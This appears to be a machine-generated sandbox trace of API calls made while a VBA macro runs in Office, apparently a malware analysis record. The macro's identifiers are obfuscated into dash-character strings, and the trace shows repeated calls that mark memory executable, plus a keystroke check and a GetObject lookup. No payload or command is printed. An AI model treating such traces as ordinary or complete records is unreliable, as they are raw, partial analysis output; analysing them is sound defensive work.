0xaf5168 [0112.024] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x96\x97\x97\x96\x97\x96\x96\x96\x96\x96\x96\x97\x97\x97\x96\x97", cchCount1=-1, lpString2="\x97\x97\x96\x97\x97\x97\x96\x96\x96\x97\x96\x96\x96\x96\x96\x97\x97\x96", cchCount2=-1) returned 1 [0112.024] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x96\x96\x96\x97\x96\x97\x97\x96\x97\x96\x96\x97\x97\x96\x97\x96", cchCount1=-1, lpString2="\x97\x97\x96\x97\x97\x97\x96\x96\x96\x97\x96\x96\x96\x96\x96\x97\x97\x96", cchCount2=-1) returned 1 [0112.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d52efa, cbMultiByte=19, lpWideCharStr=0x1976a4, cchWideChar=20 | out: lpWideCharStr="——–———–––—–––––——–") returned 19 [0112.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c32dd2, cbMultiByte=19, lpWideCharStr=0x197704, cchWideChar=20 | out: lpWideCharStr="——–———–––—–––––——–") returned 19 [0112.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c32dd2, cbMultiByte=19, lpWideCharStr=0x197704, cchWideChar=20 | out: lpWideCharStr="——–———–––—–––––——–") returned 19 [0112.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c32dd2, cbMultiByte=19, lpWideCharStr=0x197704, cchWideChar=20 | out: lpWideCharStr="——–———–––—–––––——–") returned 19 [0112.025] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x96\x97\x97\x96\x97\x96\x96\x96\x96\x96\x96\x97\x97\x97\x96\x97", cchCount1=-1, lpString2="\x97\x97\x96\x97\x97\x97\x96\x96\x96\x97\x96\x96\x96\x96\x96\x97\x97\x96", cchCount2=-1) returned 1 [0112.025] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x96\x96\x96\x97\x96\x97\x97\x96\x97\x96\x96\x97\x97\x96\x97\x96", cchCount1=-1, lpString2="\x97\x97\x96\x97\x97\x97\x96\x96\x96\x97\x96\x96\x96\x96\x96\x97\x97\x96", cchCount2=-1) returned 1 [0112.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c32dd2, cbMultiByte=19, lpWideCharStr=0x197704, cchWideChar=20 | out: lpWideCharStr="——–———–––—–––––——–") returned 19 [0112.026] CRetailMalloc_Alloc () returned 0xcadad80 [0112.026] _mbscpy_s (in: _Dst=0xcadad80, _DstSizeInBytes=0x13, _Src=0x9c32dd2 | out: _Dst=0xcadad80) returned 0x0 [0112.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10c6e, cbMultiByte=26, lpWideCharStr=0x197714, cchWideChar=27 | out: lpWideCharStr="_B_var_——–———–––—–––––——–") returned 26 [0112.026] _mbscpy_s (in: _Dst=0x19777c, _DstSizeInBytes=0x13, _Src=0x9c32dd2 | out: _Dst=0x19777c) returned 0x0 [0112.026] CRetailMalloc_Free () returned 0x1 [0112.026] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0112.026] memcpy (in: _Dst=0xaf5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0112.026] memcpy (in: _Dst=0xaf5168, _Src=0x1976f4, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0112.026] memcpy (in: _Dst=0xaf5168, _Src=0x1976f4, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0112.027] memcpy (in: _Dst=0xaf5168, _Src=0x1976f4, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0112.027] memcpy (in: _Dst=0xaf5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0112.027] memcpy (in: _Dst=0xaf5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0112.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6842ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0112.035] memcpy (in: _Dst=0xcae21b8, _Src=0x197924, _Size=0x18 | out: _Dst=0xcae21b8) returned 0xcae21b8 [0112.035] CRetailMalloc_Realloc () returned 0xcae20a0 [0112.036] CRetailMalloc_Free () returned 0x1 [0112.036] GetCurrentProcess () returned 0xffffffff [0112.036] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0112.036] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.037] GetCurrentProcess () returned 0xffffffff [0112.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0112.037] GetCurrentProcess () returned 0xffffffff [0112.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0112.037] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.037] GetCurrentProcess () returned 0xffffffff [0112.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0112.037] GetCurrentProcess () returned 0xffffffff [0112.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0112.038] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.038] GetCurrentProcess () returned 0xffffffff [0112.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0112.038] GetCurrentProcess () returned 0xffffffff [0112.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0112.038] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.039] GetCurrentProcess () returned 0xffffffff [0112.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0112.039] GetCurrentProcess () returned 0xffffffff [0112.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0112.039] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.040] GetCurrentProcess () returned 0xffffffff [0112.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0112.040] GetCurrentProcess () returned 0xffffffff [0112.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0112.040] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.040] GetCurrentProcess () returned 0xffffffff [0112.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0112.040] GetCurrentProcess () returned 0xffffffff [0112.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0112.040] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.041] GetCurrentProcess () returned 0xffffffff [0112.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0112.041] GetCurrentProcess () returned 0xffffffff [0112.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0112.041] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.042] GetCurrentProcess () returned 0xffffffff [0112.042] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0112.042] GetCurrentProcess () returned 0xffffffff [0112.042] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0112.042] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.043] GetCurrentProcess () returned 0xffffffff [0112.043] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0112.043] GetCurrentProcess () returned 0xffffffff [0112.043] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0112.043] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.044] GetCurrentProcess () returned 0xffffffff [0112.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0112.044] GetCurrentProcess () returned 0xffffffff [0112.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0112.044] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.045] GetCurrentProcess () returned 0xffffffff [0112.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0112.045] GetCurrentProcess () returned 0xffffffff [0112.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0112.045] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.045] GetCurrentProcess () returned 0xffffffff [0112.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0112.045] GetCurrentProcess () returned 0xffffffff [0112.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0112.045] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.046] GetCurrentProcess () returned 0xffffffff [0112.046] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0112.046] GetCurrentProcess () returned 0xffffffff [0112.046] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0112.046] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.047] GetCurrentProcess () returned 0xffffffff [0112.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0112.047] GetCurrentProcess () returned 0xffffffff [0112.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0112.047] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.047] GetCurrentProcess () returned 0xffffffff [0112.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0112.048] GetCurrentProcess () returned 0xffffffff [0112.048] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0112.048] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.048] GetCurrentProcess () returned 0xffffffff [0112.048] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0112.048] GetCurrentProcess () returned 0xffffffff [0112.048] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0112.048] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.049] GetCurrentProcess () returned 0xffffffff [0112.049] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0112.049] GetCurrentProcess () returned 0xffffffff [0112.049] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0112.049] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.050] GetCurrentProcess () returned 0xffffffff [0112.050] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0112.050] GetCurrentProcess () returned 0xffffffff [0112.050] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0112.050] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.050] GetCurrentProcess () returned 0xffffffff [0112.050] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0112.050] GetCurrentProcess () returned 0xffffffff [0112.050] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0112.050] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.051] GetCurrentProcess () returned 0xffffffff [0112.051] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0112.051] GetCurrentProcess () returned 0xffffffff [0112.051] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0112.051] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.052] GetCurrentProcess () returned 0xffffffff [0112.052] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0112.052] GetCurrentProcess () returned 0xffffffff [0112.052] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0112.052] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.052] GetCurrentProcess () returned 0xffffffff [0112.053] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0112.053] GetCurrentProcess () returned 0xffffffff [0112.053] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0112.053] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.053] GetCurrentProcess () returned 0xffffffff [0112.053] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0112.053] GetCurrentProcess () returned 0xffffffff [0112.053] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0112.053] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.054] GetCurrentProcess () returned 0xffffffff [0112.054] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0112.054] GetCurrentProcess () returned 0xffffffff [0112.054] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0112.054] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.055] GetCurrentProcess () returned 0xffffffff [0112.055] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0112.055] GetCurrentProcess () returned 0xffffffff [0112.055] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0112.055] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.055] GetCurrentProcess () returned 0xffffffff [0112.055] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0112.055] GetCurrentProcess () returned 0xffffffff [0112.055] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0112.056] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.056] GetCurrentProcess () returned 0xffffffff [0112.056] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0112.056] GetCurrentProcess () returned 0xffffffff [0112.056] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0112.056] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.057] GetCurrentProcess () returned 0xffffffff [0112.057] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0112.057] GetCurrentProcess () returned 0xffffffff [0112.057] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0112.057] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.058] GetCurrentProcess () returned 0xffffffff [0112.058] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0112.058] GetCurrentProcess () returned 0xffffffff [0112.058] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0112.058] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.058] GetCurrentProcess () returned 0xffffffff [0112.058] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0112.058] GetCurrentProcess () returned 0xffffffff [0112.058] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0112.059] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0112.059] GetCurrentProcess () returned 0xffffffff [0112.059] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0112.072] GetAsyncKeyState (vKey=3) returned 0 [0112.073] VarCmp (pvarLeft=0x197d34, pvarRight=0x197d24, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.073] VarCmp (pvarLeft=0x197d34, pvarRight=0x197d24, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.073] VarCmp (pvarLeft=0x197d34, pvarRight=0x197d24, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.073] VarCmp (pvarLeft=0x197d34, pvarRight=0x197d24, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.073] CRetailMalloc_Alloc () returned 0xcad6118 [0112.073] memcpy (in: _Dst=0xaf5168, _Src=0x197468, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0112.073] memcpy (in: _Dst=0xaf5270, _Src=0x197484, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0112.074] memcpy (in: _Dst=0xaf5168, _Src=0x197468, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0112.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d52f2a, cbMultiByte=10, lpWideCharStr=0x197284, cchWideChar=11 | out: lpWideCharStr="GetObject") returned 10 [0112.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d105ba, cbMultiByte=10, lpWideCharStr=0x1972e4, cchWideChar=11 | out: lpWideCharStr="GetObject") returned 10 [0112.075] memcpy (in: _Dst=0xaf5168, _Src=0x1972d4, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0112.075] memcpy (in: _Dst=0xaf5168, _Src=0x197468, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0112.075] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x96\x97\x97\x96\x97\x96\x96\x96\x96\x96\x97", cchCount1=-1, lpString2="\x97\x97\x96\x97\x97\x96\x96\x96\x96\x97\x96\x96\x96", cchCount2=-1) returned 3 [0112.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d52f52, cbMultiByte=14, lpWideCharStr=0x197284, cchWideChar=15 | out: lpWideCharStr="——–——––––—–––") returned 14 [0112.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d1058e, cbMultiByte=14, lpWideCharStr=0x1972e4, cchWideChar=15 | out: lpWideCharStr="——–——––––—–––") returned 14 [0112.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d1058e, cbMultiByte=14, lpWideCharStr=0x1972e4, cchWideChar=15 | out: lpWideCharStr="——–——––––—–––") returned 14 [0112.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d1058e, cbMultiByte=14, lpWideCharStr=0x1972e4, cchWideChar=15 | out: lpWideCharStr="——–——––––—–––") returned 14 [0112.076] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x96\x97\x97\x96\x97\x96\x96\x96\x96\x96\x97", cchCount1=-1, lpString2="\x97\x97\x96\x97\x97\x96\x96\x96\x96\x97\x96\x96\x96", cchCount2=-1) returned 3 [0112.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d1058e, cbMultiByte=14, lpWideCharStr=0x1972e4, cchWideChar=15 | out: lpWideCharStr="——–——––––—–––") returned 14 [0112.076] CRetailMalloc_Alloc () returned 0xc83f640 [0112.076] _mbscpy_s (in: _Dst=0xc83f640, _DstSizeInBytes=0xe, _Src=0x9d1058e | out: _Dst=0xc83f640) returned 0x0 [0112.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10ca6, cbMultiByte=21, lpWideCharStr=0x1972f4, cchWideChar=22 | out: lpWideCharStr="_B_var_——–——––––—–––") returned 21 [0112.076] _mbscpy_s (in: _Dst=0x19735c, _DstSizeInBytes=0xe, _Src=0x9d1058e | out: _Dst=0x19735c) returned 0x0 [0112.076] CRetailMalloc_Free () returned 0x1 [0112.076] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0112.076] memcpy (in: _Dst=0xaf5168, _Src=0x197468, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0112.076] memcpy (in: _Dst=0xaf516c, _Src=0x197468, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0112.076] memcpy (in: _Dst=0xaf5168, _Src=0x1972d4, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0112.076] memcpy (in: _Dst=0xaf5168, _Src=0x1972d4, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0112.077] memcpy (in: _Dst=0xaf5168, _Src=0x197468, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0112.077] memcpy (in: _Dst=0xaf5168, _Src=0x197468, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0112.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6842ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0112.077] memcpy (in: _Dst=0xcad6198, _Src=0x197504, _Size=0x18 | out: _Dst=0xcad6198) returned 0xcad6198 [0112.077] CRetailMalloc_Realloc () returned 0xcad6118 [0112.077] CRetailMalloc_Free () returned 0x1 [0112.077] GetCurrentProcess () returned 0xffffffff [0112.077] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0112.077] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.078] GetCurrentProcess () returned 0xffffffff [0112.078] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0112.078] GetCurrentProcess () returned 0xffffffff [0112.078] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0112.078] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.079] GetCurrentProcess () returned 0xffffffff [0112.079] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0112.079] GetCurrentProcess () returned 0xffffffff [0112.079] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0112.079] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.079] GetCurrentProcess () returned 0xffffffff [0112.079] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0112.079] GetCurrentProcess () returned 0xffffffff [0112.079] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0112.079] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.080] GetCurrentProcess () returned 0xffffffff [0112.080] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0112.080] GetCurrentProcess () returned 0xffffffff [0112.080] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0112.080] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.080] GetCurrentProcess () returned 0xffffffff [0112.080] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0112.080] GetCurrentProcess () returned 0xffffffff [0112.080] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0112.080] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.081] 